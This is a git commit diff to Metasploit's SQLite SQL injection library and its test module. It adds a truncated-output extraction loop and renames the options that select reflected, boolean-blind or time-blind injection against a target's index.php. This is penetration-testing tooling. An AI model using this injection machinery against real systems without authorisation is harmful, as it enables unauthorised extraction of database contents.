add truncated SQLi in SQLite, and update test module to add it as an option
This commit is contained in:
parent
8f9a849591
commit
4374edd37a
|
@ -9,7 +9,7 @@ module Msf::Exploit::SQLi::SQLitei
|
|||
decode: proc { |data| Rex::Text.hex_to_raw(data) }
|
||||
}
|
||||
}.freeze
|
||||
def initialize(opts, &query_proc)
|
||||
def initialize(opts={}, &query_proc)
|
||||
opts[:concat_separator] ||= ','
|
||||
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
|
||||
opts[:encoder] = opts[:encoder].downcase.intern
|
||||
|
@ -81,6 +81,20 @@ module Msf::Exploit::SQLi::SQLitei
|
|||
|
||||
private
|
||||
|
||||
def truncated_query(query)
|
||||
result = [ ]
|
||||
offset = 1
|
||||
loop do
|
||||
slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
|
||||
offset += @truncation_length # should be same as @truncation_length for most cases
|
||||
result << slice
|
||||
vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
|
||||
print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
|
||||
break if slice.length < @truncation_length
|
||||
end
|
||||
result.join
|
||||
end
|
||||
|
||||
def call_function(function)
|
||||
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
|
||||
output = nil
|
||||
|
|
|
@ -28,18 +28,19 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RHOST('127.0.0.1'),
|
||||
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
||||
OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
||||
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
|
||||
OptBool.new('HEX_ENCODE_STRINGS', [false, 'replace strings in the query with hex numbers?', false]),
|
||||
OptInt.new('SqliType', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
||||
OptString.new('Encoder', [false, 'an encoder to use (hex for example)', '']),
|
||||
OptBool.new('HexEncodeStrings', [false, 'Replace strings in the query with hex numbers?', false]),
|
||||
OptInt.new('TruncationLength', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def boolean_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||
sqli = SQLitei::BooleanBasedBlind.new({
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
||||
hex_encode_strings: datastore['HexEncodeStrings']
|
||||
}) do |payload|
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -59,10 +60,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def reflected
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
||||
sqli = SQLitei::Common.new({
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||
truncation_length: truncation
|
||||
}) do |payload|
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -78,7 +81,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
if !body
|
||||
''
|
||||
else
|
||||
body.strip
|
||||
body = body.strip
|
||||
truncation ? body[0, truncation] : body
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -90,10 +94,10 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def time_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||
sqli = SQLitei::TimeBasedBlind.new({
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||
}) do |payload|
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -139,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
case datastore['SQLI_TYPE']
|
||||
case datastore['SqliType']
|
||||
when 0 then reflected
|
||||
when 1 then boolean_blind
|
||||
when 2 then time_blind
|
||||
|
|
Loading…
Reference in New Issue